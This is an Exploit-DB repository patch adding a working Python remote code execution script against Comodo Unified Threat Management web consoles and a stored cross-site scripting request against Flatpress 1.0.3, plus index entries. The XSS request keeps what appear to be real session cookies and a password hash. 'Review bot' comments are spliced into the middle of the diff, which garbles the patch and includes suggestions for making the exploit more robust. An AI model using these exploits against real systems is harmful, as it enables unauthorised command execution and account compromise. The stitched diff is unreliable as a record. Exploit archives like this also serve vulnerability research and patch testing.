From 1a8b74a305c893445965269c5a2b60c53fc39e0b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 23 Sep 2020 05:02:05 +0000
Subject: [PATCH] DB: 2020-09-23 2 changes to exploits/shellcodes Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
---
 exploits/multiple/webapps/48825.py | 50 ++++++++++++++++++++++++++++++
 exploits/php/webapps/48826.txt | 34 ++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 86 insertions(+)
 create mode 100755 exploits/multiple/webapps/48825.py
 create mode 100644 exploits/php/webapps/48826.txt
diff --git a/exploits/multiple/webapps/48825.py b/exploits/multiple/webapps/48825.py
new file mode 100755
index 000000000..4acb88eaf
--- /dev/null
+++ b/exploits/multiple/webapps/48825.py
@@ -0,0 +1,50 @@
+# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
+# Date: 2018-08-15
+# Exploit Author: Milad Fadavvi
+# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
+# Vendor Homepage: https://www.comodo.com/
+# Version: Releases before 2.7.0 & 1.5.0
+# Tested on: Windows=Firefox/chrome - Kali=firefox
+# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
+# CVE : CVE-2018-17431
+# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
+# CVSS 3 score: 9.8
+
+import requests
+
+def RndInt(Lenght):
+ from random import choice
+ from string import digits
+
+ RandonInt = ''.join([choice(digits) for n in range(Lenght)])
+ return str(RandonInt)
+
+if __name__ == "__main__":
+
+ IP = input("IP: ")
+ Port = input("Port: ")
+
+ Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
+ '''For more info about command try to read manual of spesefic version of Comodo UTM and
+ exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
+ '''
+
+ BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
+ BaseNComdURL = BaseURL + "&k=" + Command
+ LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
+ FullURL = BaseNComdURL + LastPart
+ AddetionalEnter = BaseURL + "&k=%0a" + LastPart
+
+ try:
+ FirstResponse = requests.get(FullURL).text
+ except:
+ print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
+ exit(1)
+
+ SecondResponse = requests.get(AddetionalEnter).text
+ if SecondResponse.find("Configuration has been altered") == -1:
+ print("\nExploit Failed!\n")
+ exit(1)
+ else:
+ print("\nOK! Command Ran!\n")
+ exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/48826.txt b/exploits/php/webapps/48826.txt
new file mode 100644
index 000000000..290d7489a
--- /dev/null
+++ b/exploits/php/webapps/48826.txt
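Review bot: The bare `except:` around the first `requests.get` swallows SystemExit and KeyboardInterrupt along with HTTP errors, and neither `requests.get` call passes a `timeout`, so an unreachable or stalled host hangs the script indefinitely; narrow it to `except requests.RequestException:` and use `requests.get(FullURL, timeout=10)` (likewise for `AddetionalEnter`). `FirstResponse` is assigned but never read, `exit()` is the `site`-module helper rather than `sys.exit()`, and the triple-quoted text after `Command` is a no-op expression statement rather than a comment. The title line names 2.7.0 as the affected version while the `# Version:` header says releases before 2.7.0 & 1.5.0 — the two should be reconciled. The indentation shown here (the `try` body at the same level as `try:`) looks like whitespace collapse in this rendering rather than the committed file, but is worth confirming.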
@@ -0,0 +1,34 @@
+# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
+# Google Dork: -
+# Date: 2020-09-19
+# Exploit Author: Alperen Ergel
+# Vendor Homepage: https://www.flatpress.org/
+# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
+# Version: 1.0.3
+# Tested on: windows 10 / xampp
+# CVE : -
+
+
+# Proof Of Content
+
+POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 223
+Origin: http://localhost/
+Connection: close
+Referer: http://localhost/flatpress/admin.php?p=entry&action=write
+Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
+Upgrade-Insecure-Requests: 1
+
+_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS×tamp=1600526382&
+entry=entry200919-143942&attachselect=--&imageselect=--&content=&savecontinue=Save%26Continue
+
+
+# Snipp
+
+content=[PAYLOAD] //
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 17720c850..304bf16a4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
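Review bot: On the `_wpnonce=` line the parameter `&timestamp=` has been mangled into `×tamp=` (the `&times` prefix was decoded as the HTML entity `&times;`), so the request as written no longer carries a `timestamp` field; it should read `&subject=XSS&timestamp=1600526382&`. The `Cookie` header still contains what appear to be the tester's live `fpuser`, `fppass` (apparently a password hash) and `fpsess` values plus `_ga`/`_gid` analytics ids; none of them are needed for the proof and should be replaced with labelled placeholders such as `fpsess_fp-<id>=<SESSION>`. The body is shown wrapped onto two lines (`...1600526382&` / `entry=...`), which would not match `Content-Length: 223` if sent literally — presumably display wrapping, but worth stating. `# Proof Of Content` is presumably meant to be `Proof of Concept`.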
@@ -40649,6 +40649,8 @@ id,file,description,date,author,type,platform,port
 48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php,
 48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware,
 48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
+48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,
+48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,